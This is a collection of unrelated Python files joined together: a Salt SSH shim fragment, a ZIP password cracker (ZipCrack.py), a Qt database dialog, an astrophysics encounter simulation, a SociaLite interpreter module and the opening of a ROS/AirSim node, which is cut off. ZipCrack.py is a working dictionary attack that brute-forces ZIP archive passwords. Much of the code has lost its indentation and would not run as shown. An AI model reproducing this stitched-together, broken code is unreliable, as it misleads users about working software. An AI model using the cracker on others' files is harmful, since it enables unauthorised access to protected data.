cmd_str = self._cmd_str()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
log.trace("STDOUT %s\n%s", self.target["host"], stdout)
log.trace("STDERR %s\n%s", self.target["host"], stderr)
log.debug("RETCODE %s: %s", self.target["host"], retcode)
error = self.categorize_shim_errors(stdout, stderr, retcode)
if error:
if error == "Python environment not found on Windows system":
saltwinshell.deploy_python(self)
stdout, stderr, retcode = self.shim_cmd(cmd_str)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif error == "Undefined SHIM state":
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying thin, undefined state: {}".format(
stdout
),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
return "ERROR: {}".format(error), stderr, retcode
# FIXME: this discards output from ssh_shim if the shim succeeds. It should
# always save the shim output regardless of shim success or failure.
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if re.search(RSTR_RE, stderr):
            # Found RSTR in stderr, which means the SHIM completed and the
            # remaining output is only from salt.
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
# RSTR was found in stdout but not stderr - which means there
# is a SHIM command for the master.
shim_command = re.split(r"\r?\n", stdout, 1)[0].strip()
log.debug("SHIM retcode(%s) and command: %s", retcode, shim_command)
if (
"deploy" == shim_command
and retcode == salt.defaults.exitcodes.EX_THIN_DEPLOY
):
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
if not self.tty:
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
return self.cmd_block()
elif not re.search(RSTR_RE, stdout):
# If RSTR is not seen in stdout with tty, then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if self.tty:
stderr = ""
else:
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif "ext_mods" == shim_command:
self.deploy_ext()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying ext_mods: {}".format(stdout),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
return stdout, stderr, retcode
def categorize_shim_errors(self, stdout_bytes, stderr_bytes, retcode):
stdout = salt.utils.stringutils.to_unicode(stdout_bytes)
stderr = salt.utils.stringutils.to_unicode(stderr_bytes)
if re.search(RSTR_RE, stdout) and stdout != RSTR + "\n":
# RSTR was found in stdout which means that the shim
# functioned without *errors* . . . but there may be shim
# commands, unless the only thing we found is RSTR
return None
if re.search(RSTR_RE, stderr):
# Undefined state
return "Undefined SHIM state"
if stderr.startswith("Permission denied"):
# SHIM was not even reached
return None
perm_error_fmt = (
"Permissions problem, target user may need " "to be root or use sudo:\n {0}"
)
errors = [
(
(),
"sudo: no tty present and no askpass program specified",
"sudo expected a password, NOPASSWD required",
),
(
(salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,),
"Python interpreter is too old",
"Python version error. Recommendation(s) follow:\n"
"- Install Python 3 on the target machine(s)\n"
"- You can use ssh_pre_flight or raw shell (-r) to install Python 3",
),
(
(salt.defaults.exitcodes.EX_THIN_CHECKSUM,),
"checksum mismatched",
"The salt thin transfer was corrupted",
),
(
(salt.defaults.exitcodes.EX_SCP_NOT_FOUND,),
"scp not found",
"No scp binary. openssh-clients package required",
),
(
(salt.defaults.exitcodes.EX_CANTCREAT,),
"salt path .* exists but is not a directory",
"A necessary path for salt thin unexpectedly exists:\n " + stderr,
),
(
(),
"sudo: sorry, you must have a tty to run sudo",
"sudo is configured with requiretty",
),
((), "Failed to open log file", perm_error_fmt.format(stderr)),
((), "Permission denied:.*/salt", perm_error_fmt.format(stderr)),
(
(),
"Failed to create directory path.*/salt",
perm_error_fmt.format(stderr),
),
(
(salt.defaults.exitcodes.EX_SOFTWARE,),
"exists but is not",
"An internal error occurred with the shim, please investigate:\n "
+ stderr,
),
(
(),
"The system cannot find the path specified",
"Python environment not found on Windows system",
),
(
(),
"is not recognized",
"Python environment not found on Windows system",
),
]
for error in errors:
if retcode in error[0] or re.search(error[1], stderr):
return error[2]
return None
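    # Illustrative example (hypothetical values): assuming RSTR was not already
    # found in the output, a shim run that exits with
    # salt.defaults.exitcodes.EX_THIN_CHECKSUM, or whose stderr contains
    # "checksum mismatched", is categorized by the table above as
    # "The salt thin transfer was corrupted".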
def check_refresh(self, data, ret):
"""
Stub out check_refresh
"""
return
def module_refresh(self):
"""
Module refresh is not needed, stub it out
"""
return
def lowstate_file_refs(chunks):
"""
Create a list of file ref objects to reconcile
"""
refs = {}
for chunk in chunks:
saltenv = "base"
crefs = []
for state in chunk:
if state == "__env__":
saltenv = chunk[state]
elif state == "saltenv":
saltenv = chunk[state]
elif state.startswith("__"):
continue
crefs.extend(salt_refs(chunk[state]))
if crefs:
if saltenv not in refs:
refs[saltenv] = []
refs[saltenv].append(crefs)
return refs
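# Illustrative example (hypothetical chunk): for a lowstate chunk such as
#     {"__env__": "dev", "name": "salt://web/nginx.conf", "source": "salt://web/app.sls"}
# lowstate_file_refs would return roughly
#     {"dev": [["salt://web/nginx.conf", "salt://web/app.sls"]]}
# (ref order follows the chunk's key order), since salt_refs() only keeps
# values that start with "salt://".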
def salt_refs(data):
"""
Pull salt file references out of the states
"""
proto = "salt://"
ret = []
if isinstance(data, str):
if data.startswith(proto):
return [data]
if isinstance(data, list):
for comp in data:
if isinstance(comp, str):
if comp.startswith(proto):
ret.append(comp)
return ret
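# Illustrative example (hypothetical values): salt_refs("salt://top.sls")
# returns ["salt://top.sls"], salt_refs(["salt://a.sls", "/etc/hosts"])
# returns ["salt://a.sls"], and any other input yields [].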
def mod_data(fsclient):
"""
Generate the module arguments for the shim data
"""
# TODO, change out for a fileserver backend
sync_refs = [
"modules",
"states",
"grains",
"renderers",
"returners",
]
ret = {}
envs = fsclient.envs()
ver_base = ""
for env in envs:
files = fsclient.file_list(env)
for ref in sync_refs:
mods_data = {}
pref = "_{}".format(ref)
for fn_ in sorted(files):
if fn_.startswith(pref):
if fn_.endswith((".py", ".so", ".pyx")):
full = salt.utils.url.create(fn_)
mod_path = fsclient.cache_file(full, env)
if not os.path.isfile(mod_path):
continue
mods_data[os.path.basename(fn_)] = mod_path
chunk = salt.utils.hashutils.get_hash(mod_path)
ver_base += chunk
if mods_data:
if ref in ret:
ret[ref].update(mods_data)
else:
ret[ref] = mods_data
if not ret:
return {}
ver_base = salt.utils.stringutils.to_bytes(ver_base)
ver = hashlib.sha1(ver_base).hexdigest()
ext_tar_path = os.path.join(
fsclient.opts["cachedir"], "ext_mods.{}.tgz".format(ver)
)
mods = {"version": ver, "file": ext_tar_path}
if os.path.isfile(ext_tar_path):
return mods
tfp = tarfile.open(ext_tar_path, "w:gz")
verfile = os.path.join(fsclient.opts["cachedir"], "ext_mods.ver")
with salt.utils.files.fopen(verfile, "w+") as fp_:
fp_.write(ver)
tfp.add(verfile, "ext_version")
for ref in ret:
for fn_ in ret[ref]:
tfp.add(ret[ref][fn_], os.path.join(ref, fn_))
tfp.close()
return mods
def ssh_version():
"""
Returns the version of the installed ssh command
"""
# This function needs more granular checks and to be validated against
# older versions of ssh
ret = subprocess.Popen(
["ssh", "-V"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
try:
        # OpenSSH reports its version on stderr, e.g. b"OpenSSH_8.2p1 ..., OpenSSL ...";
        # split the numeric portion on b"." so int() sees digit groups, not raw bytes
        version_parts = ret[1].split(b",")[0].split(b"_")[1].split(b".")
        parts = []
        for part in version_parts:
try:
parts.append(int(part))
except ValueError:
return tuple(parts)
return tuple(parts)
except IndexError:
return (2, 0)
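# Illustrative example (hypothetical banner): for an "ssh -V" banner like
# "OpenSSH_8.2p1 Ubuntu-4ubuntu0.5, OpenSSL ...", the parsing above stops at the
# first non-numeric component and returns (8,); a banner it cannot parse at all
# falls back to (2, 0).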
def _convert_args(args):
"""
Take a list of args, and convert any dicts inside the list to keyword
args in the form of `key=value`, ready to be passed to salt-ssh
"""
converted = []
for arg in args:
if isinstance(arg, dict):
for key in list(arg.keys()):
if key == "__kwarg__":
continue
converted.append("{}={}".format(key, arg[key]))
else:
converted.append(arg)
return converted
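# Illustrative example (hypothetical values):
#     _convert_args(["web01", {"test": True, "__kwarg__": True}])
# returns ["web01", "test=True"]; the "__kwarg__" marker key is dropped and
# every other dict entry is flattened into a "key=value" string.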
|
ZipCrack.py
|
import zipfile
import threading
def extractFile(zFile, password):
    try:
        # ZipFile.extractall() expects the password as bytes on Python 3
        zFile.extractall(pwd=password.encode('utf-8'))
        print("Found Passwd : ", password)
        return password
    except Exception:
        pass
def main():
    zFile = zipfile.ZipFile('unzip.zip')
    with open('dictionary.txt') as passFile:
        for line in passFile:
            password = line.strip('\n')
            t = threading.Thread(target=extractFile, args=(zFile, password))
            t.start()
if __name__ == '__main__':
main()
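# Usage note (assumptions, not part of the original script): 'unzip.zip' and
# 'dictionary.txt' are expected to sit in the current working directory; each
# dictionary line is tried as a password in its own thread, and the first
# successful extractall() prints the recovered password.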
|
copy_db_dialog.py
|
#!/usr/bin/env python
#
# Copyright 2019 DFKI GmbH.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the
# following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
# NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
# USE OR OTHER DEALINGS IN THE SOFTWARE.
import threading
from PySide2.QtWidgets import QDialog, QTreeWidgetItem, QFileDialog
from PySide2.QtCore import Qt
from motion_analysis.gui.layout.copy_db_dialog_ui import Ui_Dialog
from vis_utils.io import load_json_file
from anim_utils.animation_data.skeleton_models import SKELETON_MODELS
from motion_analysis.constants import DB_URL
from anim_utils.utilities.db_interface import get_collections_by_parent_id_from_remote_db
class CopyDBDialog(QDialog, Ui_Dialog):
def __init__(self, db_url, parent=None):
QDialog.__init__(self, parent)
Ui_Dialog.setupUi(self, self)
self.db_url = db_url
self.selectButton.clicked.connect(self.slot_accept)
self.cancelButton.clicked.connect(self.slot_reject)
self.success = False
self.collection = None
t = threading.Thread(target=self.fill_tree_widget)
t.start()
def slot_accept(self):
col = self.get_collection()
if col is not None:
self.collection, c_name, c_type = col
self.success = True
self.close()
def slot_reject(self):
self.close()
def fill_tree_widget(self, parent=None):
if parent is None:
self.collectionTreeWidget.clear()
self.rootItem = QTreeWidgetItem(self.collectionTreeWidget, ["root", "root"])
self.rootItem.setExpanded(True)
# root collection has id 0
parent_id = 0
parent_item = self.rootItem
self.rootItem.setData(0, Qt.UserRole, parent_id)
else:
parent_id = parent[1]
parent_item = parent[0]
collection_list = get_collections_by_parent_id_from_remote_db(self.db_url, parent_id)
for col in collection_list:
colItem = QTreeWidgetItem(parent_item, [col[1], col[2]])
colItem.setData(0, Qt.UserRole, col[0])
self.fill_tree_widget((colItem, col[0]))
def get_collection(self):
colItem = self.collectionTreeWidget.currentItem()
if colItem is None:
return
return int(colItem.data(0, Qt.UserRole)), str(colItem.text(0)), str(colItem.text(1))
|
sim_encounters.py
|
# ------------------------------------- #
# Python Package Importing #
# ------------------------------------- #
# Importing Necessary System Packages
import sys, os, math
import numpy as np
import matplotlib as plt
import time as tp
import random as rp
from optparse import OptionParser
import glob
# Importing Multiprocessing Packages
from functools import partial
import multiprocessing as mp
import queue
import threading
# Importing cPickle/Pickle
try:
    import cPickle as pickle  # Python 2 fast pickler, if available
except ImportError:
    import pickle
# Import the Amuse Base Packages
from amuse import datamodel
from amuse.units import nbody_system
from amuse.units import units
from amuse.units import constants
from amuse.datamodel import particle_attributes
from amuse.io import *
from amuse.lab import *
from tycho import util, scattering
# Import the Amuse Gravity & Close-Encounter Packages
from amuse.community.smalln.interface import SmallN
from amuse.community.kepler.interface import Kepler
from amuse.community.ph4.interface import ph4
from amuse.community.secularmultiple.interface import SecularMultiple
from amuse.community.sse.interface import SSE
from amuse.datamodel.trees import BinaryTreesOnAParticleSet
from amuse.ext.orbital_elements import new_binary_from_orbital_elements
# Import the Tycho Packages
from tycho import create, util, read, write, stellar_systems, enc_patching
# Set Backend (For DRACO Only)
import matplotlib; matplotlib.use('agg')
# ------------------------------------- #
# Required Non-Seperable Functions #
# ------------------------------------- #
global job_queue
job_queue = queue.Queue()
def remote_process(desiredFunction):
while not job_queue.empty():
try:
current_clusterDir = job_queue.get()
except:
return None
desiredFunction(current_clusterDir)
job_queue.task_done()
# Announce to Terminal that the Current Task is Done
#sys.stdout.flush()
#print "\n", util.timestamp(), "Star ID", str(current_starID), "has finished processing!"
#print "\n", util.timestamp(), "There are", job_queue.qsize(), "stars left to process!"
#sys.stdout.flush()
def mpScatterExperiments(list_of_clusterDirs, desiredFunction):
for clusterDir in list_of_clusterDirs:
job_queue.put(clusterDir)
num_of_cpus = mp.cpu_count()-2
for i in range(num_of_cpus):
th = threading.Thread(target=remote_process, args=(desiredFunction,))
th.daemon = True
th.start()
job_queue.join()
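# Illustrative usage (hypothetical paths): mpScatterExperiments(
#     ["/data/run1/ClusterA/", "/data/run1/ClusterB/"], simulate_all_close_encounters)
# queues each cluster directory and lets (cpu_count() - 2) daemon threads drain
# the queue, each calling the supplied function on one directory at a time.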
def simulate_all_close_encounters(rootExecDir, **kwargs):
'''
This function will run all scatters for a single cluster in serial.
str rootExecDir -> The absolute root directory for all single cluster files.
'''
max_number_of_rotations = kwargs.get("maxRotations", 100)
max_runtime = kwargs.get("maxRunTime", 10**5) # Units Years
delta_time = kwargs.get("dt", 10) # Units Years
# Strip off Extra '/' if added by user to bring inline with os.cwd()
if rootExecDir.endswith("/"):
rootExecDir = rootExecDir[:-1]
# Define the Cluster's Name
cluster_name = rootExecDir.split("/")[-1]
# Generate List of Scattering IC HDF5 Paths
enc_dict = scattering.build_ClusterEncounterHistory(rootExecDir)
# Find all Primary Star IDs
star_IDs = enc_dict.keys() # Integer tied to StarID
# Set Up Output Directory Structure
output_MainDirectory = rootExecDir+"/Encounters"
if not os.path.exists(output_MainDirectory):
os.mkdir(output_MainDirectory)
# Initialize the Necessary Worker Lists
converter = nbody_system.nbody_to_si(1 | units.MSun, 100 |units.AU)
KepW = []
for i in range(2):
KepW.append(Kepler(unit_converter = converter, redirection = 'none'))
KepW[-1].initialize_code()
NBodyW = [scattering.initialize_GravCode(ph4), scattering.initialize_isOverCode()]
SecW = SecularMultiple()
SEVW = SSE()
# Loop Over the Stars
for star_ID in star_IDs:
# Load the Close Encounter class for the Star
EncounterHandler = scattering.CloseEncounters(enc_dict[star_ID], KeplerWorkerList = KepW, \
NBodyWorkerList = NBodyW, SecularWorker = SecW, SEVWorker = SEVW)
# Simulate Encounter
EncounterHandler.SimAllEncounters()
# Prepare Data for Pickling
file_name = output_MainDirectory+"/"+str(star_ID)+"_EncounterHandler.pk"
p_file = open(file_name, "wb")
# Remove Worker Lists from Class for Storage
EncounterHandler.kep = None
EncounterHandler.NBodyCodes = None
EncounterHandler.SecularCode = None
EncounterHandler.SEVCode = None
# Pickle EncounterHandler Class
# Note: This allows for ease-of-use when you want to revisit
# a specific star's simulation set in detail.
pickle.dump(EncounterHandler, p_file)
p_file.close()
        # Note: Explicitly delete the EncounterHandler instance in case a
        #       memory leak becomes possible in future updates.
del EncounterHandler
    # Stop all Workers (SEVW is a single worker, so wrap it in a list before concatenating)
    for Worker in KepW + NBodyW + [SecW, SEVW]:
        Worker.stop()
# ------------------------------------- #
# Defining Functions #
# ------------------------------------- #
# ------------------------------------- #
# Main Production Script #
# ------------------------------------- #
if __name__=="__main__":
import time
s_time = tp.time()
# ------------------------------------- #
# Setting up Required Variables #
# ------------------------------------- #
parser = OptionParser()
parser.add_option("-d", "--rootdirectory", dest="rootDir", default=None, type="str",
help="Enter the full directory of the Root Folder. Defaults to your CWD unless -M is on.")
parser.add_option("-M", "--doMultipleClusters", dest="doMultipleClusters", action="store_true",
help="Flag to turn on for running the script over a series of multiple clusters.")
parser.add_option("-S", "--serial", dest="doSerial", action="store_true",
help="Run the program in serial?.")
(options, args) = parser.parse_args()
if options.doMultipleClusters:
if options.rootDir != None:
rootDir = options.rootDir+'/*'
else:
print(util.timestamp(), "Please provide the path to your root directory which contains all cluster folders!", cluster_name,"...")
else:
if options.rootDir != None:
rootDir = options.rootDir
else:
rootDir = os.getcwd()
# Bring Root Directory Path Inline with os.cwd()
if rootDir.endswith("/"):
rootDir = rootDir[:-1]
doSerial = options.doSerial
base_planet_ID = 50000
# ------------------------------------- #
# Defining File/Directory Structure #
# ------------------------------------- #
if options.doMultipleClusters:
all_clusterDirs = glob.glob(rootDir+"/*/")
else:
all_clusterDirs = [rootDir+"/"]
# ------------------------------------- #
# Perform All Req. Simulations #
# ------------------------------------- #
if doSerial:
for clusterDir in all_clusterDirs:
# Announce to Terminal that the Runs are Starting
sys.stdout.flush()
print(util.timestamp(), "Cluster", clusterDir.split("/")[-2], "has begun processing!")
sys.stdout.flush()
simulate_all_close_encounters(clusterDir)
else:
# Begin Looping Through Clusters (Each Cluster is a Queued Process)
mpScatterExperiments(all_clusterDirs, simulate_all_close_encounters)
e_time = tp.time()
# Announce to Terminal that the Runs have Finished
sys.stdout.flush()
print(util.timestamp(), "All clusters have finished processing.")
print(util.timestamp(), len(all_clusterDirs), "clusters were processed in", (e_time - s_time), "seconds!")
sys.stdout.flush()
|
OLD_SociaLite.py
|
import socialite.engine.LocalEngine as LocalEngine
import socialite.engine.ClientEngine as ClientEngine
import socialite.tables.QueryVisitor as QueryVisitor
import socialite.tables.Tuple as Tuple
import socialite.util.SociaLiteException as SociaLiteException
import socialite.type.Utf8 as Utf8
import sys
import java.util.concurrent.atomic.AtomicBoolean as AtomicBool
import java.lang.InterruptedException as JavaInterruptedException
from threading import Thread, InterruptedException, Condition, Lock
from Queue import Queue
__all__ = ['returns', 'cwd', 'chdir', 'store', 'load', 'tables', 'status', 'engine', 'SociaLiteException', 'double']
__doc__ = """
Useful functions:
tables() : shows declared SociaLite tables
status() : shows runtime status of SociaLite
Use backtik(`) to run SociaLite queries
e.g. `Friend(String i, (String f)).` # declares a table Friend having two columns.
`Friend(a,b) :- a="John Smith", b="Jane Doe".` # inserts a tuple into Friend.
for i, f in `Friend(i, f)`: # iterates over tuples in Friend
print i, f
Type help(socialite.examples) to see more SociaLite query examples.
"""
examples="""
`Edge(int i, (int f)).` # declares Edge table (with nested 2nd column).
`Edge(int i:0..1000, (int f)).` # Values of 1st column of Edge is between 0 and 1000
`Edge(s, t) :- l=$read("edges.txt"), # $read returns lines in edges.txt
(a,b)=$split(l, "\\t"),# splits a string with a delimiter, tab here.
s=$toInt(a), # Casting a,b into primitive int.
t=$toInt(b).`
`Foaf(i, f) :- Friend(i,x), Friend(x,f).` # joins Friend table with itself
# to compute friends-of-friends
# and store the result in Foaf.
for i, f in `Foaf(i, f)`: # iterates over tuples in Foaf
print i, f
`FriendCnt(int i, int cnt) groupby(1). # we will apply $inc to the 'cnt' column,
# which requires groupby with one column (column 'i').
FriendCnt(i, $inc(1)) :- Friend(i,f).` # counting the # of friends for each person.
@returns(int) # annotates function return type
def randInt(s, e): # to access it from SociaLite queries
import random as r
return r.randint(s, e)
# Computes average friend counts for randomly selected samples.
`SampleAvg(int i:0..0, Avg avg).
SampleAvg(0, $avg(cnt)) :- i=$randInt(0,100), FriendCnt(i, cnt).`
"""
# Initialize useful functions (help, quit, ...)
import __builtin__
class _Helper(object):
def __init__(self):
global examples
self.socialite = sys.modules[__name__]
self.socialiteExamples = examples
def __repr__(self):
return "Type help(socialite) for help on SociaLite, " \
"or help(object) for help about object."
def __call__(self, *args, **kwds):
if args and args[0]==self.socialite:
print self.socialite.__doc__
return
elif args and args[0]==self.socialiteExamples:
print self.socialite.examples
return
import pydoc
return pydoc.help(*args, **kwds)
def sethelper():
__builtin__.socialite = sys.modules[__name__]
__builtin__.help = _Helper()
import os
def setquit():
"""Define new built-ins 'quit' and 'exit'.
These are simply strings that display a hint on how to exit.
"""
if os.sep == ':':
eof = 'Cmd-Q'
elif os.sep == '\\':
eof = 'Ctrl-Z plus Return'
else:
eof = 'Ctrl-D (i.e. EOF)'
class Quitter(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return 'Use %s() or %s to exit' % (self.name, eof)
def __call__(self, code=None):
# Shells like IDLE catch the SystemExit, but listen when their
# stdin wrapper is closed.
try:
sys.stdin.close()
except:
pass
raise SystemExit(code)
__builtin__.quit = Quitter('quit')
__builtin__.exit = Quitter('exit')
double = float
def internal(f):
f.internal = True
return f
internal.internal = True
isInteractive = False
isClusterEngine = False
engine = None
@internal
def init(cpu=None, dist=False, interactive=False, verbose=None):
verbose = True
global engine, isClusterEngine, isInteractive
if engine==None:
if dist:
engine = ClientEngine()
isClusterEngine = True
else:
engine = LocalEngine()
#if interactive:
# isInteractive = True
# engine = AsyncEngine(engine)
cleanupFuncsBefore =[]
cleanupFuncsAfter =[]
cleanupLock = Lock()
@internal
def registerCleanupOnExit(f, before=True):
try:
cleanupLock.acquire()
if before: cleanupFuncsBefore.append(f)
else: cleanupFuncsAfter.append(f)
finally:
cleanupLock.release()
@internal
def unregisterCleanupOnExit(f):
try:
cleanupLock.acquire()
cleanupFuncsBefore.remove(f)
cleanupFuncsAfter.remove(f)
finally:
cleanupLock.release()
cleanupDone = AtomicBool()
import time
@internal
def cleanupOnExit():
if cleanupDone.compareAndSet(False, True):
for f in cleanupFuncsBefore: f()
#time.sleep(0.02)
engine.shutdown()
for f in cleanupFuncsAfter: f()
#time.sleep(0.02)
def install_funcs():
sethelper()
setquit()
import atexit
atexit.register(cleanupOnExit)
install_funcs()
@internal
def cwd(): return engine.cwd()
@internal
def chdir(path): engine.chdir(path)
@internal
def store(): engine.storeWorkspace()
@internal
def load(): engine.loadWorkspace()
@internal
def tables(verbose=0):
status = engine.status(0)
print status.getTableStatus()
@internal
def status(verbose=0):
write = sys.stdout.write
write("** SociaLite Runtime Status **\n")
status = engine.status(verbose)
write("Number of nodes: "+status.getNodeNum()+"\n")
write("Free memory:\n")
memStat = filter(lambda x:x, status.getMemStatus().split('\n'))
memStat = ''.join(map(lambda x:' '+x+'\n', memStat))
    memStat = memStat.rstrip(' ')
write(memStat)
write("Recent rules:\n")
progStat = status.getProgress().split('\n')
progStat = ' '+'\n '.join(progStat)
    progStat = progStat.rstrip(' ')
write(progStat)
@internal
def clear(name): engine.clearTable(name)
@internal
def indent(msg, width=4, indentFirst=True):
if not msg: return msg
tab1=''
if indentFirst:tab1=' '*width
tab=' '*width
msg = tab1+msg.replace('\n','\n'+tab)
return msg.rstrip(' ')
@internal
def _removeStackTrace(msg):
if not msg: return msg
magic="at socialite.dist.master.QueryListener."
if msg.find(magic) >= 0:
msg = msg[:msg.find(magic)].strip()
magic="org.apache.hadoop.ipc.RemoteException:"
if msg.find(magic) == 0:
msg = msg[len(magic):].strip()
return msg
class AsyncEngine:
END = None
def __init__(self, engine):
self.engine = engine
self.q = Queue(maxsize=16)
self.reqThreads = []
reqThreadNum = 2
for i in xrange(reqThreadNum):
t=Thread(target=self.asyncRequest, name="Async Request Thread")
t.start()
self.reqThreads.append(t)
registerCleanupOnExit(self.cleanupReqThreads)
def getTableRef(self, name):
return self.engine.getTableRef(name)
def cleanupReqThreads(self):
try:
#for t in self.reqThreads:
# self.q.put(self.END)
for t in self.reqThreads:
t._thread.interrupt()
except:
pass
#print "Exception in cleanupReqThreads"
def asyncRequest(self):
try:
while True:
tup = self.q.get()
if tup == self.END: break
query, visitor, id, checker = tup
try:
if visitor: self.engine.run(query, visitor, id)
else: self.engine.run(query)
except Exception, e:
type, inst, tb = sys.exc_info()
errhead="Error while running:"
print "\n"+errhead+indent(query, width=len(errhead), indentFirst=False)
print indent(_removeStackTrace(inst.getMessage()))
if visitor:
visitor.raiseError(inst)
checker.done=True
self._notify(checker.cv)
except JavaInterruptedException:
pass
def _notify(self, cv):
cv.acquire()
try: cv.notify()
finally: cv.release()
def _wait(self, cv, timeout=None):
cv.acquire()
try: cv.wait(timeout)
finally: cv.release()
def run(self, program, visitor=None, id=None):
done=[]
class Checker(object): pass
checker = Checker()
checker.cv = Condition()
checker.done=False
self.q.put((program, visitor, id, checker))
self._wait(checker.cv, 3)
if not checker.done and not visitor:
print "... still running the query. Type status() to see the progress."
def cleanupTableIter(self, id):
self.engine.cleanupTableIter(id)
def cwd(self):
self.engine.cwd()
def load(self):
self.engine.load()
def status(self, verbose=0):
return self.engine.status()
def chdir(self, path):
self.engine.chdir(path)
def shutdown(self):
self.engine.shutdown()
def update(self, func):
self.engine.update(func)
def runGc(self):
self.engine.runGc()
@internal
def returns(*types):
def _wrapper(f):
if len(types) == 1:
f.returns = types[0]
else:
f.returns = types
engine.update(f)
return f
return _wrapper
@internal
def passVars(*vars):
tmp=[]
for v in vars:
if type(v) == type(0):
tmp.append(str(v))
elif type(v) == type(0L):
tmp.append(str(v)+"L")
elif type(v) == type(0.0):
tmp.append(str(v))
elif type(v) == type(""):
v = v.replace('"', '\\"')
tmp.append('"'+v+'"')
elif type(v) == type(u""):
v = v.replace('"', '\\"')
tmp.append('"'+v+'"')
elif isinstance(v , Utf8):
v = v.toString().replace('"', '\\"')
tmp.append('u"'+v+'"')
else:
raise SociaLiteException("Only numbers and Strings can be passed to SociaLite queries:"+
str(v)+" is "+str(type(v)))
return tuple(tmp)
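# Illustrative example (hypothetical values): passVars(3, "Jane Doe") returns
# ('3', '"Jane Doe"'); numbers are stringified and strings are wrapped in
# double quotes (with embedded quotes escaped) so they can be spliced into a
# SociaLite query.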
class IdFactory:
def __init__(self):
import java.util.concurrent.atomic.AtomicInteger as AtomicInt
self.nextid = AtomicInt()
def next(self):
nextid = self.nextid.getAndIncrement()
return nextid
class TableIterator(QueryVisitor):
END = None
idFactory = IdFactory()
def __init__(self, engine, query):
self.engine = engine
self.query = query
self.q = Queue(maxsize=1024)
self.finished = False
self.cleanupIterDone = AtomicBool()
self.error = None
self.thread = None
self.id = self.idFactory.next()
def startThread(self):
if self.thread: return
self.thread = t = Thread(target=self.run, name="Table Iterator Thread query="+self.query)
registerCleanupOnExit(self.cleanupIterThread, False)
t.start()
def __del__(self):
unregisterCleanupOnExit(self.cleanupIterThread)
self.cleanupIterThread()
def cleanupIterThread(self):
try:
if not self.cleanupIterDone.compareAndSet(False, True):
return
self.finished = True
self.engine.cleanupTableIter(self.id)
self.thread._thread.interrupt()
except:
pass
#print "Exception in cleanupIterThread"
def visit(self, t):
if self.finished: return False
if isinstance(t, Tuple):
cols = []
for i in xrange(t.size()):
cols.append(t.get(i))
self.q.put(tuple(cols))
else: self.q.put(t)
return True
def finish(self):
if self.finished: return
self.q.put(self.END)
def raiseError(self, error):
self.error = error
self.finish()
def run(self):
try:
self.engine.run(self.query, self, self.id)
except SociaLiteException, e1:
e1.printStackTrace()
self.q.put(self.END)
raise e1
except InterruptedException, e3:
return
except Exception, e2:
e2.printStackTrace()
self.q.put(self.END)
raise e2
def __next__(self):
if not self.thread:
self.startThread()
if self.finished or self.error:
raise StopIteration
v = self.q.get()
if self.error:
self.finished = True
raise self.error
if v == self.END:
self.finished = True
raise StopIteration
return v
def next(self):
n = self.__next__()
return n
def isEmpty(self):
try:
self.next()
return False
except StopIteration:
return True
def __iter__(self):
self.startThread()
return self
|
ibvs2airsim.py
|
#!/usr/bin/env python
import cv2
import math
import threading
import time
import yaml
import rospy
from cv_bridge import CvBridge, CvBridgeError
from std_msgs.msg import Bool
from sensor_msgs.msg import Image
from geometry_msgs.msg import TwistStamped
import airsim
class IBVS_To_AirSim():
def __init__(self):
with open('ibvs_parameter.yaml') as f:
            para = yaml.safe_load(f)
self.client = airsim.MultirotorClient()
self.client.confirmConnection()
rospy.init_node("IBVS_To_AirSim_node", anonymous=True)
rospy.Subscriber(para['LAND_TOPIC'], Bool, self._land)
rospy.Subscriber(para['FIX_POSE_TOPIC'], Bool, self._fix_pose)
